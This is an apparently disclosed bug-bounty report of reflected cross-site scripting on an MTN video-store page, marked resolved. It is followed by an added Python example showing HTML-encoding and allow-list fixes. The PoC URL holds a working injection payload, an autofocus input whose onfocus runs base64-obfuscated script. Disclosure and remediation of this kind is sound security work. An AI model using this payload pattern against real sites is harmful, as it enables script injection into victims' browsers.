XSS at videostore.mtnonline.com/GL/*.aspx via all parameters

Disclosed: 2022-05-01 21:20:58 By homosec To mtn_group
Medium
Vulnerability Details
PoC

```
https://videostore.mtnonline.com/GL/MyAccount.aspx?PId=126&CID=5&OprId=11%27><input%20onfocus=eval(atob(%27YWxlcnQoJ1hTUycp%27))%20autofocus>
```

Symbols <"/'> are not filtered, which allows HTML code to be injected.

{F1353609}

## Impact

XSS at videostore.mtnonline.com
Report Stats
  • Report ID: 1244731
  • State: Closed
  • Substate: resolved
  • Upvotes: 4
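
The fix class for the unfiltered `<"/'>` characters described in the report, as an added example that is not part of the original report or of MTN's code: it decodes the report's PoC parameter, renders it raw and HTML-encoded, and applies an allow-list check. The single-quoted `<input>` template and all function names are assumptions, since the report does not show how the server reflects the value.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# PoC URL copied verbatim from the report.
POC_URL = ("https://videostore.mtnonline.com/GL/MyAccount.aspx?PId=126&CID=5&OprId="
           "11%27><input%20onfocus=eval(atob(%27YWxlcnQoJ1hTUycp%27))%20autofocus>")

def get_param(url, name):
    """Decoded value of one query-string parameter."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)[name][0]

def render_unsafe(value):
    # Assumed (hypothetical) template: raw value inside a single-quoted attribute.
    return f"<input type='hidden' name='OprId' value='{value}'>"

def render_encoded(value):
    # Same template, value HTML-encoded including both quote characters.
    return f"<input type='hidden' name='OprId' value='{html.escape(value, quote=True)}'>"

def validate_numeric(value):
    """Allow-list check: accept ASCII digits only, else None."""
    return int(value) if value.isascii() and value.isdigit() else None

class _HandlerFinder(HTMLParser):
    """Collects (tag, attribute) pairs for on* event-handler attributes."""
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        self.found += [(tag, k) for k, _ in attrs if k.startswith("on")]

def event_handlers(markup):
    """Parse markup as a browser-like tokenizer would and list on* attributes."""
    finder = _HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.found

if __name__ == "__main__":
    v = get_param(POC_URL, "OprId")
    print("decoded    :", v)
    print("raw render :", event_handlers(render_unsafe(v)))
    print("encoded    :", event_handlers(render_encoded(v)))
    print("allow-list :", validate_numeric(v), validate_numeric("11"))
```

Encoding at output keeps the whole payload inside the `value` attribute, and the allow-list rejects it before it reaches the template; the two controls are independent and both apply to every reflected parameter.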